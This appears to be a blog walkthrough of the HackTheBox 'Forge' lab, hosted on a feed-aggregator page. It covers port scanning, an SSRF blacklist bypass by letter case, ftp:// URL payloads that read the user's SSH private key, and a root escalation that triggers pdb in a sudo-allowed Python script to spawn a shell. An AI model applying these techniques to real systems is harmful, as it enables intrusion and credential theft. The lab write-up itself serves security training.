惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

SecWiki News
SecWiki News
量子位
The Cloudflare Blog
美团技术团队
T
The Exploit Database - CXSecurity.com
博客园 - 【当耐特】
Spread Privacy
Spread Privacy
P
Proofpoint News Feed
C
CXSECURITY Database RSS Feed - CXSecurity.com
博客园 - 三生石上(FineUI控件)
T
Tor Project blog
博客园 - 司徒正美
宝玉的分享
宝玉的分享
T
Threatpost
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
S
Secure Thoughts
T
Threat Research - Cisco Blogs
Hacker News: Ask HN
Hacker News: Ask HN
Jina AI
Jina AI
博客园 - 聂微东
A
Arctic Wolf
I
Intezer
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
Know Your Adversary
Know Your Adversary
K
KPMG report finds enterprise disconnect between AI and its ROI | CIO
爱范儿
爱范儿
Hugging Face - Blog
Hugging Face - Blog
C
Cyber Attacks, Cyber Crime and Cyber Security
小众软件
小众软件
T
Tailwind CSS Blog
The Hacker News
The Hacker News
L
LINUX DO - 最新话题
Hacker News - Newest:
Hacker News - Newest: "LLM"
WordPress大学
WordPress大学
S
SegmentFault 最新的问题
TaoSecurity Blog
TaoSecurity Blog
Project Zero
Project Zero
博客园 - 叶小钗
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
Cloudbric
Cloudbric
雷峰网
雷峰网
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
大猫的无限游戏
大猫的无限游戏
D
Darknet – Hacking Tools, Hacker News & Cyber Security
T
Troy Hunt's Blog
酷 壳 – CoolShell
酷 壳 – CoolShell
V2EX - 技术
V2EX - 技术
The GitHub Blog
The GitHub Blog
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
P
Privacy & Cybersecurity Law Blog

Homepage on Aditya Telange

One Year with evil-winrm-py - A Retrospective Bypassing LinkedIn's Connection Privacy with a Simple Search Filter Making Dynamic Instrumentation Accessible with Frida UI Breaking Payload Encryption in Web Applications HackTheBox (HTB) - Escape HackTheBox (HTB) - Resolute HackTheBox (HTB) - Certified State of VMWare Workstation (Pro?) on Linux Android App Security Testing Lab with MobSleuth Android phone as a Webcam on Linux Breaking down Reverse shell commands HackTheBox (HTB) - Photobomb Merging AOSP Security Patches into Custom ROMs Primer on HTTP Security Headers Image Zoom-In effect with HUGO HackTheBox (HTB) - Legacy HackTheBox (HTB) - Lame Cryptohack - Keyed Permutations [5 pts] Cryptohack - Resisting Bruteforce [10 pts] Cryptohack - RSA Starter 1 [10 pts] Cryptohack - Base64 [10 pts] Cryptohack - Bytes and Big Integers [10 pts] Cryptohack - Hex [5 pts] Cryptohack- XOR Starter [10 pts] HackTheBox (HTB) - Horizontall HackTheBox (HTB) - Previse HackTheBox (HTB) - BountyHunter HackTheBox (HTB) - Explore HackTheBox (HTB) - Cap HackTheBox (HTB) - Pit HackTheBox (HTB) - Knife HackTheBox (HTB) - Love HackTheBox (HTB) - Tenet HackTheBox (HTB) - Ready Watermarking images with HUGO My Github Project went viral! Cryptohack - ASCII [5 pts] Cryptohack - Finding Flags [2 pts] Cryptohack - Great Snakes [3 pts] Cryptohack - JWT Sessions [10 pts] Cryptohack - Network Attacks [5 pts] Cryptohack - Token Appreciation [5 pts] CAF's Android for MSM Basic Website Analytics with Vercel Github Actions as Temporary File Sharing Platform Addition of prebuilt APK - AOSP Rom Development External Link With target='_blank' in Hugo Markdown Setting Up Build Environment - AOSP Rom Development Getting Started - AOSP Rom Development Using Secure HTTP Headers with Vercel/Zeit Education and Certifications Link Tree ↟ | Aditya Telange Personal Projects Resume - Aditya Telange Security Acknowledgements About Me Graph View License Privacy Policy
HackTheBox (HTB) - Forge
[Aditya Telange](https://x.com/adityatelange) · 2022-01-22 · via Homepage on Aditya Telange
Box Info
  • Name: Forge
  • OS: Linux
  • Difficulty: Medium
  • IP: 10.10.11.111
  • Points: 30
  • Machine Creator: NoobHacker9999

Introduction

Forge is a fun box on Hackthebox that has a File Upload functionality which is vulnerable to SSRF. This exposes the internal Admin panel and lets us read files with internal FTP service, which includes SSH key pair of the user.

Listing the available commands we can run as a superuser, we have a python script which opens a socket connection. This calls PDB with an exception occurs, with which we get a shell as root.

Scanning

Masscan resuts

We run masscan to find all ports 1-65535

sudo masscan -p1-65535,U:1-65535 --rate=500 -e tun0 10.10.11.111
Discovered open port 80/tcp on 10.10.11.111
Discovered open port 22/tcp on 10.10.11.111

NMAP resuts

We run nmap for the open ports

sudo nmap -sC -sV -oN 10.10.11.111.nmap 10.10.11.111 -p 80,22
Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for forge.htb (10.10.11.111)
Host is up (0.18s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Gallery
Service Info: Host: 10.10.11.111; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.55 seconds

Visiting http://10.10.11.111:80 redirects us to http://forge.htb

We add target box IP 10.10.11.111 to /etc/hosts of attacker box.

# Contents of /etc/hosts
10.10.11.111    forge.htb

http://forge.htb has http://forge.htb/upload to upload images but it can upload any file not only images.

we have 2 options to upload an image

- Upload local file
- Upload from url

If we use ‘upload from URL’ and put our IP, the request shows us that it is using
python-requests/2.25.1

So, now we know that the backend runs on an Apache2 which forwards requests to a local Python server. We don’t have any exploit readily available for this.

Finding subdomains

We run ffuf1 to find subdomains on forge.htb

ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt \
-u http://forge.htb -H 'Host: FUZZ.forge.htb' -fc 302

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1
________________________________________________

 :: Method           : GET
 :: URL              : http://forge.htb
 :: Wordlist         : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt
 :: Header           : Host: FUZZ.forge.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response status: 302
________________________________________________

admin                   [Status: 200, Size: 27, Words: 4, Lines: 2]
Admin                   [Status: 200, Size: 27, Words: 4, Lines: 2]
:: Progress: [87664/87664] :: Job [1/1] :: 214 req/sec :: Duration: [0:07:03] :: Errors: 0 ::

Subdomain - admin.forge.htb

We get a subdomain admin.forge.htb, we add it to /etc/hosts file.

# Contents of /etc/hosts
10.10.11.111    forge.htb admin.forge.htb

Visiting http://admin.forge.htb, tells us that Only localhost is allowed!.

We know that we can fetch any resource via upload image functionality on http://forge.htb, that’s SSRF working for us.

We put http://admin.forge.htb in the input box using Upload from url on http://forge.htb/upload

This returns URL contains a blacklisted address!

Bypassing blacklisted Pattern

We can bypass this by using http://Admin.Forge.Htb

We can now Open the URL mentioned, but we see that

The image http://forge.htb/uploads/esi2defZs6UM4xGjewXM cannot be displayed because it contains errors.

We open the URL with cURL2 and we get:

We now have 2 URIs in the Admin Dashboard:

  1. http://Admin.Forge.Htb/announcements
  2. http://Admin.Forge.Htb/upload

We use the same method to fetch the above 2 URLs

At http://Admin.Forge.Htb/announcements we find the credentials: user:hei███████████ty123! for the internal FTP server.

The instructions mention that http://admin.forge.htb/upload can upload files directly with the format:

http://admin.forge.htb/upload?u=<url>

So we can now use ftp://user:hei███████████ty123!@Localhost in URL param to fetch files from the internal FTP server.

http://Admin.Forge.Htb/upload?u=ftp://user:hei███████████ty123!@Localhost

We now paste the above URL in the input box using Upload from url on http://forge.htb/upload

Upon fetching the contents of the file URL, we get the list of files:

We can now access user.txt and get the flag using:

http://Admin.Forge.Htb/upload?u=ftp://user:hei███████████ty123!@Localhost/user.txt

We search for other interesting files such as SSH key at location ~/.ssh/id_rsa and ~/.ssh/id_rsa.pub using:

http://Admin.Forge.Htb/upload?u=ftp://user:hei███████████ty123!@Localhost/.ssh/

http://Admin.Forge.Htb/upload?u=ftp://user:hei███████████ty123!@Localhost/.ssh/id_rsa

http://Admin.Forge.Htb/upload?u=ftp://user:hei███████████ty123!@Localhost/.ssh/id_rsa.pub

And we get id_rsa id_rsa.pub

We see in id_rsa.pub key that the user here is user.

We save it to a text file id_rsa to id_rsa.txt.

Then run:

chmod 600 id_rsa.txt    # To set proper permissions to the file
ssh -i id_rsa.txt user@forge.htb    # To log in as user 'user'

We get logged in as user user in the target box.


Escalating Privileges

We run sudo -l3 and we find that the user can run /usr/bin/python3 /opt/remote-manage.py as super-user without entering a password.

We read the contents of /opt/remote-manage.py:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
#!/usr/bin/env python3
import socket
import random
import subprocess
import pdb

port = random.randint(1025, 65535)

try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(('127.0.0.1', port))
    sock.listen(1)
    print(f'Listening on localhost:{port}')
    (clientsock, addr) = sock.accept()
    clientsock.send(b'Enter the secret passsword: ')
    if clientsock.recv(1024).strip().decode() != 'secr████████████ord':
        clientsock.send(b'Wrong password!\n')
    else:
        clientsock.send(b'Welcome admin!\n')
        while True:
            clientsock.send(b'\nWhat do you wanna do: \n')
            clientsock.send(b'[1] View processes\n')
            clientsock.send(b'[2] View free memory\n')
            clientsock.send(b'[3] View listening sockets\n')
            clientsock.send(b'[4] Quit\n')
            option = int(clientsock.recv(1024).strip())
            if option == 1:
                clientsock.send(subprocess.getoutput('ps aux').encode())
            elif option == 2:
                clientsock.send(subprocess.getoutput('df').encode())
            elif option == 3:
                clientsock.send(subprocess.getoutput('ss -lnt').encode())
            elif option == 4:
                clientsock.send(b'Bye\n')
                break
except Exception as e:
    print(e)
    pdb.post_mortem(e.__traceback__)
finally:
    quit()

We run it and see that it opens up on a random port.

user@forge:~$ sudo /usr/bin/python3 /opt/remote-manage.py

To connect to the socket we log in to the target box again as user user then run:

user@forge:~$ nc localhost <port>

Now we need to just trigger the pdb - python debugger, by raising an exception to get a PDB shell in the 1st session.

We can now enter the below commands to get a system shell in the PDB shell.

import os
os.system("sh")

And we are root! We can now fetch the root.txt flag.